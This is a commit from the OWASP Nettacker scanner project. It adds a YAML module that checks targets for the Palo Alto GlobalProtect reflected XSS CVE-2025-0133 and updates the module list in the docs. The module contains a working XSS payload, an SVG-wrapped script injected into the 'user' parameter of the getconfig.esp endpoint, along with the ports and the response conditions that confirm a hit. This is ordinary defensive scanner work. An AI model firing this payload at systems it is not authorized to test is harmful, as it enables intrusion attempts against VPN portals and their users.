New module to detect PaloAlto GlobalProtect XSS CVE-2025-0133 (#1109)

* Create paloalto_globalprotect_cve_2025_0133.yaml

new module for CVE-2025-0133

* Updated docs/Modules.md

updated docs

* Update nettacker/modules/vuln/paloalto_globalprotect_cve_2025_0133.yaml

CodeRabbit YAML formatting suggestion - we have this issue pretty much with all YAML files, so a separate tidy-up PR will be needed in the future

Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>
Signed-off-by: Sam Stepanyan <sam.stepanyan@owasp.org>

---------

Signed-off-by: Sam Stepanyan <sam.stepanyan@owasp.org>
Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>
This commit is contained in:
Sam Stepanyan 2025-07-30 22:57:08 +01:00 committed by GitHub
parent e04fd1c17e
commit 630de628b9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 66 additions and 1 deletions

View File

@ -143,7 +143,8 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
* '**msexchange_cve_2021_26855**' - check the target for MS Exchange SSRF CVE-2021-26855 (proxylogon/hafnium)
* '**http_cors_vuln**' - check the web server for overly-permissive CORS (header 'Access-Control-Allow-Origin'=*)
* '**options_method_enabled_vuln**' - check if OPTIONS method is enabled on the web server
* '**paloalto_panos_cve_2025_0108_vuln** - check the target for PaloAlto PAN-OS CVE-2025-0108 vulnerability
* '**paloalto_panos_cve_2025_0108_vuln**' - check the target for PaloAlto PAN-OS CVE-2025-0108 vulnerability
* '**paloalto_globalprotect_cve_2025_0133_vuln**' - check the target for PaloAlto GlobalProtect CVE-2025-0133 XSS vulnerability
* '**ProFTPd_bypass_sqli_protection_vuln**' - check ProFTPd for CVE-2009-0543
* '**ProFTPd_cpu_consumption_vuln**' - check ProFTPd for CVE-2008-7265
* '**ProFTPd_directory_traversal_vuln**' - check ProFTPd for CVE-2010-3867

View File

@ -0,0 +1,64 @@
info:
name: paloalto_globalprotect_cve_2025_0133_vuln
author: OWASP Nettacker team
severity: 6.9
description: >
CVE-2025-0133 reflected cross-site scripting (XSS) vulnerability in the
GlobalProtect gateway and portal features of Palo Alto Networks PAN-OS
software enables execution of malicious JavaScript.
reference:
- https://security.paloaltonetworks.com/CVE-2025-0133
- https://cybersecuritynews.com/palo-alto-globalprotect-portal-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2025-0133
profiles:
- vuln
- vulnerability
- http
- medium_severity
- cve
- paloalto
- paloalto_globalprotect
- globalprotect
- panos
- cisa_kev
payloads:
- library: http
steps:
- method: get
timeout: 3
headers:
User-Agent: "{user_agent}"
allow_redirects: false
ssl: false
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
prefix: ""
suffix: ""
interceptors:
data:
paths:
- 'ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22><script>prompt%28%22XSS%22%29<%2Fscript><%2Fsvg>&domain=%28empty_domain%29&computer=computer'
schema:
- "http"
- "https"
ports:
- 80
- 443
- 4443
- 8443
response:
condition_type: and
conditions:
status_code:
regex: '200'
reverse: false
header:
X-Content-Type-Options:
regex: 'nosniff'
reverse: false
content:
regex: 'XSS'
reverse: false